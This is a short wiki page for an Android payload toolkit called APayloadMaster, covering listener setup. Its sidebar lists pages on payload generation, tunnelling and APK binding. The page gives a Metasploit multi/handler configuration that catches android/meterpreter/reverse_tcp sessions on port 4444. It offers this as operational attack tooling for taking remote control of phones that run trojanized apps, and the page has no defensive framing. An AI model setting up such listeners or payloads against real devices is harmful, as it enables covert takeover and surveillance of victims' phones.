Skip to content

Listener Setup

Mahesh M edited this page Mar 14, 2026 · 1 revision

Listener Setup

The listener waits for incoming reverse connections.

APayloadMaster automatically configures the handler.

Example configuration:

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
run

Tunnel Not Working

Check internet connectivity and tunnel authentication token.

Sidebar Navigation

# APayloadMaster Wiki

## Documentation

- [[Home]]
- [[Installation-Guide]]
- [[Quick-Start]]
- [[Features]]
- [[Payload-Generation]]
- [[Tunnel-Configuration]]
- [[APK-Binding]]
- [[Listener-Setup]]
- [[Troubleshooting]]

Clone this wiki locally